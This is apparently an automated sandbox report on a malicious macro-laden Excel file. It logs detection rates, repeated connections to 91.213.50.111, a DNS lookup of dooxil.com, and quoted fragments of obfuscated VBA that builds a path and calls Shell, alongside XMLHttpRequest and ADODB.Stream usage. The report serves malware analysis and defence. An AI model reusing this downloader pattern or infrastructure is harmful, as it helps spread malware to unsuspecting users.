Click to jump to signature section
Source: xls.xls | ReversingLabs: Detection: 17% |
Source: xls.xls | Virustotal: Detection: 39% | Perma Link |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172 |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49173 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49173 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174 |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174 |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175 |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49176 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49176 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | DNS query: name: dooxil.com |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: unknown | DNS traffic detected: queries for: dooxil.com |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171 |
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443 |
Source: xls.xls | Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'ADODB.Stream' functions open, read, write | |
Source: xls.xls | OLE, VBA macro line: riporti = trattasse(scoperte, Shell(riporti)) | |
Source: xls.xls | OLE, VBA macro line: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) | |
Source: VBA code instrumentation | OLE, VBA macro: Module Foglio1, Function dimostrargli, String environ: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) | Name: dimostrargli |
Source: xls.xls | Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'XMLHttpRequest' functions response, responsetext, open, send | |
Source: VBA code instrumentation | OLE, VBA macro: Module Foglio1, Function stupidaggine, found possibly 'XMLHttpRequest' functions response, responsetext, open, send | Name: stupidaggine |
Source: xls.xls | OLE indicator, VBA macros: true |
Source: xls.xls | ReversingLabs: Detection: 17% |
Source: xls.xls | Virustotal: Detection: 39% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR622B.tmp | Jump to behavior |
Source: xls.xls | OLE indicator, Workbook stream: true |
Source: classification engine | Classification label: mal68.expl.winXLS@1/0@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |